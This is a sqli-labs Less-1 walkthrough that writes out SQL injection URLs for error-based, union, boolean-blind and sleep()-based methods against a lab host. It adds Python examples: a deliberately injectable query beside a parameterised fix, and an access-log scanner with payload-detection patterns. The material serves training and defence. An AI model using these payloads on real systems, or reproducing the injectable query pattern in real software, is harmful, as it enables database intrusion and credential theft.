sqli-labs_less_1

Method 1: error-based injection with extractvalue()

Identify the injection point:
Enter a single quote and the page throws an error: http://172.16.173.131/sqli-labs/Less-1/?id=1'

Close the preceding single quote, comment out the trailing one, and add a test condition as the payload
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+

So use extractvalue() error-based injection.
First check whether the function can be executed
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,md5(123));--+

Retrieve version(), database(), user() and similar information
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,database()));--+

Retrieve the table names:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)));--+

Retrieve the column names of users
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)));--+

Retrieve the contents of each column (id, username, password)
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1)));--+

Method 2: union-based injection

Identify the injection point:
Enter a single quote and the page throws an error: http://172.16.173.131/sqli-labs/Less-1/?id=1'

Use order by to determine the number of columns
http://172.16.173.131/sqli-labs/Less-1/?id=1' order by 3--+
union select injection
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,22,33--+

Determine the database name:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,database(),33--+

Retrieve the table names of security:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),33--+

Retrieve the column names:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),33--+

Retrieve the contents of each column (id, username, password):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select username from security.users limit 1,1)),33--+
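Added example, not part of the original write-up and not sqli-labs' own PHP source: the Less-1 pattern of pasting the id parameter into a single-quoted SQL string, modelled in Python over an in-memory SQLite table of constructed users, next to a validated and parameterised version. The quote-closing probe and 1=1 condition from Method 1 and the union payload from Method 2 are run through both lookups (the `+` in `--+` is shown already URL-decoded to a space). SQLite stands in for MySQL, so the MySQL-only extractvalue() and sleep() functions are not modelled; the function names, table contents and the "error: ..." return value are this example's own.

```python
import sqlite3

# Constructed sample data, not the lab's real users table.
SAMPLE_USERS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The Less-1 pattern: untrusted input pasted into the SQL text between single quotes.

    Returns the fetched rows, or an 'error: ...' string when the SQL fails to parse,
    which is the condition the lab's error page reveals to the visitor.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_safe(conn, user_id):
    """Hardened form: allow-list the value, then bind it as a parameter.

    The input can never change the SQL structure, so quote closing, comments,
    extra 'and'/'union' clauses and sleep() conditions have no effect.
    """
    if not user_id.isdigit():
        return []
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 1"
    return conn.execute(sql, (int(user_id),)).fetchall()


# The walkthrough's payloads as the web server hands them to the application
# after URL decoding ('--+' becomes '-- ' because '+' decodes to a space).
PAYLOADS = {
    "probe": "1'",
    "boolean": "1' and 1=1-- ",
    "union": "1' and 1=2 union select 11,22,33-- ",
}


def compare(conn):
    """Run every payload through both lookups; returns {name: (vulnerable, safe)}."""
    return {name: (lookup_vulnerable(conn, p), lookup_safe(conn, p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in compare(make_db()).items():
        print(name, "| vulnerable ->", vuln, "| safe ->", safe)
```

The vulnerable lookup reproduces each step of the write-up: the bare quote produces a parse error, the 1=1 condition still returns the legitimate row, and the union payload returns the attacker-chosen row (11, 22, 33). The safe lookup returns nothing for all three, because the value never reaches the SQL parser as SQL.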

Method 3: boolean-based injection using the page response (ascii comparison one character at a time)

Identify the injection point:
Enter a single quote and the page throws an error: http://172.16.173.131/sqli-labs/Less-1/?id=1'
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
Retrieve the database name:
Use ascii() to test one character at a time, changing the second argument of substr() from 1 to n
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr(database(),1,1))=115--+
Retrieve the table names (emails, referers, uagents, users):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
Retrieve the column names of users:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105--+
Retrieve the contents of each column (id, username, password)
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))>65--+

Method 4: time-based blind injection (sleep(), if())

if((condition), m, n): returns m if the condition is true and n if it is false;
Retrieve the database name:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and sleep(if((ascii(substr(database(),1,1))=115),5,0))--+
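Added example, not from the original page: a small access-log scanner that flags the four payload families used across Methods 1 to 4 (extractvalue() error-based, union select, ascii(substr(...)) boolean comparisons, and sleep() timing) together with information_schema lookups. It URL-decodes the query string first so that `%27` and `--+` do not hide the keywords, and it also flags a non-numeric id value, which for this lab catches the bare single-quote probe that precedes every method. The log lines are constructed to mirror the walkthrough's requests; the indicator names and functions are this example's own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators for the payload families in the walkthrough. They are matched against the
# URL-decoded, lower-cased query string so that encoding does not hide the keywords.
INDICATORS = {
    "error-based": re.compile(r"\bextractvalue\s*\("),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "boolean-blind": re.compile(r"\bascii\s*\(\s*substr"),
    "time-based": re.compile(r"\bsleep\s*\("),
    "schema-enum": re.compile(r"\binformation_schema\."),
}

# Combined-log-format line: the request target sits between the quotes after the method.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def _param(raw_query, name):
    """Return the decoded value of one query parameter, splitting on '&' before decoding."""
    for pair in raw_query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def classify_query(target):
    """Return the sorted list of indicator names that fire on one request target."""
    parts = urlsplit(target)
    query = unquote_plus(parts.query).lower()
    labels = [name for name, rx in INDICATORS.items() if rx.search(query)]
    # The lab's id parameter is numeric; anything else is at least a probe worth logging.
    id_value = _param(parts.query, "id")
    if id_value is not None and not id_value.isdigit():
        labels.append("non-numeric-id")
    return sorted(labels)


def scan_log(lines):
    """Return (request target, indicators) for every log line with at least one indicator."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        labels = classify_query(m.group(1))
        if labels:
            hits.append((m.group(1), labels))
    return hits


# Constructed access-log lines modelled on the walkthrough's requests (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1%27 HTTP/1.1" 200 610',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%20extractvalue(1,concat(0x7e,database()));--+ HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%2011,database(),33--+ HTTP/1.1" 200 520',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%2011,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)),33--+ HTTP/1.1" 200 530',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))=115--+ HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%20sleep(if((ascii(substr(database(),1,1))=115),5,0))--+ HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    for target, labels in scan_log(SAMPLE_LOG):
        print(", ".join(labels), "<-", target)
```

The benign `?id=1` request produces no labels, while every other line is flagged; the time-based request carries both the boolean-blind and time-based labels because the walkthrough's sleep() payload wraps the same ascii(substr(...)) comparison. Keyword indicators alone are easy to evade with alternative syntax, which is why the non-numeric-id check on a parameter the application knows to be numeric is the more durable signal here.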